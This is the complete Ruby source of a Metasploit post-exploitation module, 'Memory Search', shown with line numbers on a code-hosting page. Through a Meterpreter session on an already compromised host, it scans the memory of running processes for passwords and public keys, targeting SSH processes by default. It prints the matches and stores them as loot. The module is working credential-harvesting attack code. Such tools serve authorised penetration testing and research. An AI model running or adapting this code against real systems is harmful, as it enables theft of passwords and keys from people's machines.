Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Memory Search',
13
        'Description' => %q{
14
          This module allows for searching the memory space of running processes for
15
          potentially sensitive data such as passwords.
16
        },
17
        'License' => MSF_LICENSE,
18
        'Author' => %w[sjanusz-r7],
19
        'SessionTypes' => %w[meterpreter],
20
        'Platform' => %w[linux unix osx windows],
21
        'Arch' => [ARCH_X86, ARCH_X64],
22
        'Compat' => {
23
          'Meterpreter' => {
24
            'Commands' => %w[
25
              stdapi_sys_process_memory_search
26
              stdapi_sys_process_get_processes
27
            ]
28
          }
29
        },
30
        'Notes' => {
31
          'Stability' => [CRASH_SAFE],
32
          'Reliability' => [],
33
          'SideEffects' => []
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        ::Msf::OptString.new('PROCESS_NAMES_GLOB', [false, 'Glob used to target processes', 'ssh*']),
41
        ::Msf::OptString.new('PROCESS_IDS', [false, 'Comma delimited process ID/IDs to search through']),
42
        ::Msf::OptString.new('REGEX', [true, 'Regular expression to search for within memory', 'publickey,password.*']),
43
        ::Msf::OptInt.new('MIN_MATCH_LEN', [true, 'The minimum number of bytes to match', 5]),
44
        ::Msf::OptInt.new('MAX_MATCH_LEN', [true, 'The maximum number of bytes to match', 127]),
45
        ::Msf::OptBool.new('REPLACE_NON_PRINTABLE_BYTES', [false, 'Replace non-printable bytes with "."', true]),
46
        ::Msf::OptBool.new('SAVE_LOOT', [false, 'Save the memory matches to loot', true])
47
      ]
48
    )
49
  end
50

51
  def process_names_glob
52
    datastore['PROCESS_NAMES_GLOB']
53
  end
54

55
  def process_ids
56
    datastore['PROCESS_IDS']
57
  end
58

59
  def regex
60
    datastore['REGEX']
61
  end
62

63
  def min_match_len
64
    datastore['MIN_MATCH_LEN']
65
  end
66

67
  def max_match_len
68
    datastore['MAX_MATCH_LEN']
69
  end
70

71
  def replace_non_printable_bytes?
72
    datastore['REPLACE_NON_PRINTABLE_BYTES']
73
  end
74

75
  def save_loot?
76
    datastore['SAVE_LOOT']
77
  end
78

79
  ARCH_MAP =
80
    {
81
      'i686' => ARCH_X86,
82
      'x86' => ARCH_X86,
83
      'x64' => ARCH_X64,
84
      'x86_64' => ARCH_X64
85
    }.freeze
86

87
  def get_target_processes
88
    raw_target_pids = process_ids || ''
89
    target_pids = raw_target_pids.split(',').map(&:to_i)
90
    target_processes = []
91

92
    session_processes = session.sys.process.get_processes
93
    process_table = session_processes.to_table
94
    process_table.columns.unshift 'Matched?'
95

96
    process_table.colprops.unshift(
97
      {
98
        'Formatters' => [],
99
        'Stylers' => [::Msf::Ui::Console::TablePrint::CustomColorStyler.new('true' => '%grn', 'false' => '%red')],
100
        'ColumnStylers' => []
101
      }
102
    )
103

104
    process_table.sort_index += 1
105

106
    session_processes.each.with_index do |session_process, index|
107
      pid, _ppid, name, _path, _session, _user, _arch = *session_process.values
108

109
      if target_pids.include?(pid) || ::File.fnmatch(process_names_glob || '', name, ::File::FNM_EXTGLOB)
110
        target_processes.append session_process
111
        process_table.rows[index].unshift 'true'
112
      else
113
        process_table.rows[index].unshift 'false'
114
      end
115
    end
116

117
    vprint_status(process_table.to_s)
118
    target_processes
119
  end
120

121
  def run_against_multiple_processes(processes: [])
122
    results = []
123

124
    processes.each do |process|
125
      response = nil
126
      status = nil
127

128
      begin
129
        response = session.sys.process.memory_search(
130
          pid: process['pid'],
131
          needles: [regex],
132
          min_match_length: min_match_len,
133
          max_match_length: max_match_len
134
        )
135
        status = :success
136
      rescue ::Rex::Post::Meterpreter::RequestError => e
137
        response = e
138
        status = :failure
139
      end
140

141
      results.append({ process: process, status: status, response: response })
142
    end
143

144
    results
145
  end
146

147
  def print_result(result: nil)
148
    return unless result
149

150
    process_info = "#{result[:process]['name']} (pid: #{result[:process]['pid']})"
151
    unless result[:status] == :success
152
      warning_message = "Memory search request for #{process_info} failed. Return code: #{result[:response]}"
153
      if result[:process]['arch'].empty? || result[:process]['path'].empty?
154
        warning_message << "\n    Potential reasons:"
155
        warning_message << "\n\tInsufficient permissions."
156
      end
157
      print_warning warning_message
158
      return
159
    end
160

161
    result_group_tlvs = result[:response].get_tlvs(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_RESULTS)
162
    if result_group_tlvs.empty?
163
      match_not_found_msg = "No regular expression matches were found in memory for #{process_info}."
164
      normalised_process_arch = ARCH_MAP[result[:process]['arch']] || result[:process]['arch']
165

166
      potential_failure_reasons = []
167

168
      if session.arch != normalised_process_arch
169
        potential_failure_reasons.append "Architecture mismatch (session: #{session.arch}) (process: #{normalised_process_arch})"
170
      end
171

172
      if potential_failure_reasons.any?
173
        match_not_found_msg << "\n    Potential reasons:"
174
        potential_failure_reasons.each { |potential_reason| match_not_found_msg << "\n\t#{potential_reason}" }
175
      end
176

177
      print_status match_not_found_msg
178
      return
179
    end
180

181
    results_table = ::Rex::Text::Table.new(
182
      'Header' => "Memory Matches for #{process_info}",
183
      'Indent' => 1,
184
      'Columns' => ['Match Address', 'Match Length', 'Match Buffer', 'Memory Region Start', 'Memory Region Size']
185
    )
186

187
    address_length = session.native_arch == ARCH_X64 ? 16 : 8
188
    result_group_tlvs.each do |result_group_tlv|
189
      match_address = result_group_tlv.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR).value.to_s(16).upcase
190
      match_buffer = result_group_tlv.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_STR).value
191
      # Mettle doesn't return this TLV. We can get the match length from the buffer instead.
192
      match_length = result_group_tlv.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_LEN)&.value
193
      match_length ||= match_buffer.bytesize
194
      region_start_address = result_group_tlv.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_START_ADDR).value.to_s(16).upcase
195
      region_start_size = result_group_tlv.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_SECT_LEN).value.to_s(16).upcase
196

197
      if replace_non_printable_bytes?
198
        match_buffer = match_buffer.bytes.map { |byte| /[[:print:]]/.match?(byte.chr) ? byte.chr : '.' }.join
199
      end
200

201
      results_table << [
202
        "0x#{match_address.rjust(address_length, '0')}",
203
        match_length,
204
        match_buffer.inspect,
205
        "0x#{region_start_address.rjust(address_length, '0')}",
206
        "0x#{region_start_size.rjust(address_length, '0')}"
207
      ]
208
    end
209

210
    print_status results_table.to_s
211
  end
212

213
  def save_loot(results: [])
214
    return if results.empty?
215

216
    # Each result has a single response, which contains zero or more group tlv's.
217
    results.each do |result|
218
      # We don't want to save results that failed
219
      next unless result[:status] == :success
220

221
      group_tlvs = result[:response].get_tlvs(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_RESULTS)
222
      next if group_tlvs.empty?
223

224
      group_tlvs.each do |group_tlv|
225
        match = group_tlv.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_STR)
226
        next unless match
227

228
        stored_loot = store_loot(
229
          'memory.dmp',
230
          'bin',
231
          session,
232
          match,
233
          "memory_search_#{result[:process]['name']}.bin",
234
          'Process Raw Memory Buffer'
235
        )
236
        vprint_good("Loot stored to: #{stored_loot}")
237
      end
238
    end
239
  end
240

241
  def run
242
    if session.type != 'meterpreter'
243
      print_error 'Only Meterpreter sessions are supported by this post module'
244
      return
245
    end
246

247
    if process_ids && !process_ids.match?(/^(\s*\d(\s*,\s*\d+\s*)*)*$/)
248
      print_error 'PROCESS_IDS is not a comma-separated list of integers'
249
      return
250
    end
251

252
    print_status "Running module against - #{session.info} (#{session.session_host}). This might take a few seconds..."
253

254
    print_status 'Getting target processes...'
255
    target_processes = get_target_processes
256
    if target_processes.empty?
257
      print_warning 'No target processes found.'
258
      return
259
    end
260

261
    target_processes_message = "Running against the following processes:\n"
262
    target_processes.each do |target_process|
263
      target_processes_message << "\t#{target_process['name']} (pid: #{target_process['pid']})\n"
264
    end
265

266
    print_status target_processes_message
267
    processes_results = run_against_multiple_processes(processes: target_processes)
268
    processes_results.each { |process_result| print_result(result: process_result) }
269

270
    save_loot(results: processes_results) if save_loot?
271
  end
272
end
273

274